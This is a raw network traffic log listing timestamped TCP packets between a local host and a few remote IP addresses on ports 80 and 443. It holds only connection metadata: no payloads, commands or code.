Feb 21, 2024 08:14:08.719382048 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.719414949 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719433069 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719489098 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719491959 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.719505072 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719533920 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.719584942 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719635963 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719664097 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719679117 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719690084 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719708920 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719721079 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.719748020 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719832897 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.719885111 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719907045 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719930887 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.719969988 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720012903 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.720041037 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720093966 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.720161915 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720217943 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720232010 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720374107 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720395088 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720410109 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.720452070 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720458984 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.720513105 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720539093 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720552921 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720588923 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720617056 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.720617056 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.720629930 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720643044 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720654964 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.720710993 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.720710993 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.724666119 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.724679947 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.724842072 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.724857092 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.724911928 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.724925041 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.724972010 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.724984884 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.725013971 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.725054979 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.725058079 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.725081921 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.725131035 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.725143909 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.725163937 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.725177050 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.725213051 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.725244045 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.725244045 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.725378036 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.725392103 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.725404024 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.725435972 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.725446939 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.725446939 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.725446939 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.725456953 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.725711107 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.933763981 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.933825970 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.933893919 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.933936119 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.933957100 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.934001923 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934041977 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.934045076 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934094906 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934156895 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934191942 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.934201002 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934259892 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934281111 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.934303999 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934330940 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.934355974 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934422016 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.934434891 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934509993 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934639931 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934650898 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.934701920 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934760094 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934779882 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.934797049 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934828043 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934851885 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.934917927 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934931040 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.934988022 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.935010910 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935077906 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935144901 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935185909 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935194969 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.935245037 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935297966 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935332060 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.935337067 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935395002 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935431004 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.935477972 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935499907 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935520887 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935610056 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935611010 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.935636044 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935672045 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.935698032 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935736895 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.935743093 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935782909 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935801029 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.935842991 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935900927 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.935951948 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936002016 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936024904 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.936101913 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.936103106 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936172962 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936209917 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.936222076 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936270952 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936321020 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936352968 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936356068 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.936424017 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936441898 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.936461926 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936501980 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.936516047 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936539888 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936564922 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.936606884 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936664104 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936728954 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936763048 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.936800003 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936849117 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936867952 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.936907053 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.936945915 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.937006950 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937046051 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937066078 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.937100887 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937174082 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937256098 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937417030 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937511921 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.937516928 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937530994 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937578917 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937618017 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937634945 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.937693119 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937732935 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937747955 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.937767982 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937788010 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.937877893 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937912941 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.937933922 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937947035 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.937988043 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938057899 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938083887 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.938134909 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938188076 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938258886 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938283920 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.938317060 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938354969 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.938355923 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938420057 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.938425064 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938479900 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938494921 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938577890 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938627005 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938673019 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938698053 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.938698053 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.938735008 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938779116 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.938798904 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938874960 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938951015 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.938976049 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.939009905 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939059019 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939114094 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939132929 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.939136982 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939193964 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939224005 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.939249992 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939306021 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939335108 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.939390898 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939457893 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939491034 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.939516068 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939541101 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939626932 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939666033 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939702034 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.939719915 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939774990 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939830065 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939843893 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939902067 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.939902067 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.939924955 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.939975023 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940009117 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940099001 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.940099001 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.940103054 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940175056 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940402031 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940414906 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940445900 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940501928 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.940501928 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.940582037 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940598011 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940629959 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940644979 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940665007 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940670013 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.940682888 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940689087 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.940768003 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940809011 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.940855026 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.940865040 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940880060 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940891027 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940915108 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940927982 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940938950 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940951109 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.940977097 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.940999031 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.940999031 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.941003084 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941015959 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941114902 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941128016 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941139936 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941199064 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.941199064 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.941220999 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941255093 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941291094 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941329956 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941344023 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941370010 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.941385031 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941397905 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941420078 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941447020 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.941447020 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.941452980 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941466093 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941488981 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941512108 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.941512108 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.941536903 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941627979 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941673994 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941723108 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.941778898 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941850901 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941863060 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941884041 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941910982 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941911936 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.941911936 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.941911936 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.941946983 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.941960096 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.942023039 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.942056894 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.942090034 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.942122936 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.942152023 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.942171097 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.942198992 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.942202091 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:08.942213058 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:08.942329884 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.048716068 CET	49674	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:09.131422997 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.131464958 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.131750107 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.132420063 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.132431030 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.138575077 CET	49673	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:09.138576031 CET	49675	443	192.168.2.5	23.1.237.91
Feb 21, 2024 08:14:09.149142981 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149161100 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149174929 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149235964 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149256945 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149270058 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149271965 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.149282932 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149315119 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.149318933 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149337053 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149362087 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149374962 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149382114 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.149382114 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.149457932 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149470091 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149482012 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149502039 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.149502039 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.149524927 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149538040 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149549961 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149563074 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149585962 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.149611950 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149619102 CET	49716	80	192.168.2.5	5.101.153.86
